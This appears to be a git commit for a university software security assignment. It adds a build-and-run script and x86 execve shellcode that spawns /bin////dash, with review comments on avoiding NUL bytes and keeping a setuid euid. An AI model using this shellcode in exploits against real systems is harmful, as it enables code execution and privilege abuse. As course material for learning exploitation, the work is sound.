[Assignment-5] added solution task 3 (shellcode)
This commit is contained in:
parent
055c31519e
commit
6648789260
2 changed files with 37 additions and 5 deletions
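--- /dev/null
+++ b/Assignment 5 - Software Security - Teil 1/shellcode/exploit
@@ -0,0 +1,16 @@
+#!/bin/bash
+
+# assemble shellcode
+nasm -felf32 shellcode.asm -o x.o && ld -m elf_i386 x.o -o shellcode &> /dev/null
+
+# remove object file
+rm x.o
+
+# extract shellcode and remove binary
+shellcode=$(for byte in $(objdump -d ./shellcode | grep "^ " | cut -f2); do echo -n '\x'$byte; done)
+rm shellcode
+
+# TODO place shellcode into test_shellcode.c and shellcode.asm
+
+# compile test_shellcode.c and execute it afterwards
+gcc -o test_shellcode -m32 -fno-stack-protector -fno-pie -z execstack -O0 test_shellcode.c && ./test_shellcode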
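Review bot: The bytes collected into `shellcode=$(...)` are never printed or used afterwards, so the `# TODO place shellcode into test_shellcode.c` step is a manual copy from nowhere, and nothing checks the extracted bytes for `\x00`, which would silently truncate the payload the moment it is copied as a C string in the test harness. The build line also discards linker output with `&> /dev/null` and `rm x.o` runs whether or not `nasm` succeeded, so a stale `shellcode` binary left over from an earlier run could be extracted without anyone noticing. Failing fast on each build step, rejecting NUL bytes and echoing the result fixes all three; the lines below replace the corresponding lines of the commit.
```bash
nasm -felf32 shellcode.asm -o x.o || exit 1
ld -m elf_i386 x.o -o shellcode || exit 1
# … unchanged: rm x.o, objdump extraction, rm shellcode …
case "$shellcode" in
    *'\x00'*) echo "shellcode contains a NUL byte; a strcpy()-style copy would truncate it" >&2; exit 1 ;;
esac
printf '%s\n' "$shellcode"
# … unchanged: gcc test_shellcode.c && ./test_shellcode …
```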
@ -1,8 +1,24 @@
; SHELLCODE: "\x90\x90\x90..."
; SHELLCODE: "\x31\xc0\x50\x68\x64\x61\x73\x68\x68\x2f\x2f\x2f\x2f\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"
global _start
section .text
global _start
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; https://rayoflightz.github.io/shellcoding/linux/x86/2018/11/15/Shellcoding-for-linux-on-x86.html ;
; https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86-32_bit ;
; https://man7.org/linux/man-pages/man2/execve.2.html ;
; https://www.ascii-code.com/ ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
_start:
_start:
;----------------------------------
xor eax, eax ; set eax to NULL without terminating the shellcode later
nop; <YOUR CODE HERE>
push eax ; push a null byte onto the stack as the string terminator
; ------------ End of file ------------
push 0x68736164 ; push the ASCII values for 'dash' onto the stack in reverse order (due to little endian)
push 0x2f2f2f2f ; push the ASCII values for '////' onto the stack in reverse order "
push 0x6e69622f ; push the ASCII values for '/bin' onto the stack in reverse order "
mov ebx, esp ; set ebx to the address of the '/bin////dash' string (top of the stack)
mov ecx, eax ; set ecx to NULL (=> char *const _Nullable argv[] is NULL)
mov edx, eax ; set edx to NULL (=> char *const _Nullable envp[] is NULL)
mov al, 0xb ; load the syscall number for execve (11) into lowest 8 bits of eax to prevent null bytes in shellcode
int 0x80 ; trigger the kernel interrupt to execute the syscall
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
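Review bot: `mov ecx, eax` on the argv line hands execve a NULL argv, which the execve(2) page cited in the header describes as a nonstandard Linux misfeature not to rely on, and newer kernels (5.18 onward, if I recall the change correctly) substitute an empty argv[0] and log a warning, so the spawned shell sees argc = 0 and programs that read argv[0] can misbehave. A proper argv costs two extra bytes and stays NUL-free: after `mov ebx, esp` write `push eax` / `push ebx` / `mov ecx, esp` so ecx points at `{"/bin////dash", NULL}`, then regenerate the `; SHELLCODE:` byte string in the header comment, which otherwise goes stale (the current 28 bytes do match the listing). The slash padding and the choice of dash are presumably there to make the path a multiple of four bytes and to get a shell that does not drop an elevated euid the way bash does; a comment stating both reasons, e.g. `; '/bin////dash': 12 bytes = 3 dword pushes, and dash keeps a setuid euid`, would spare the next reader the guess.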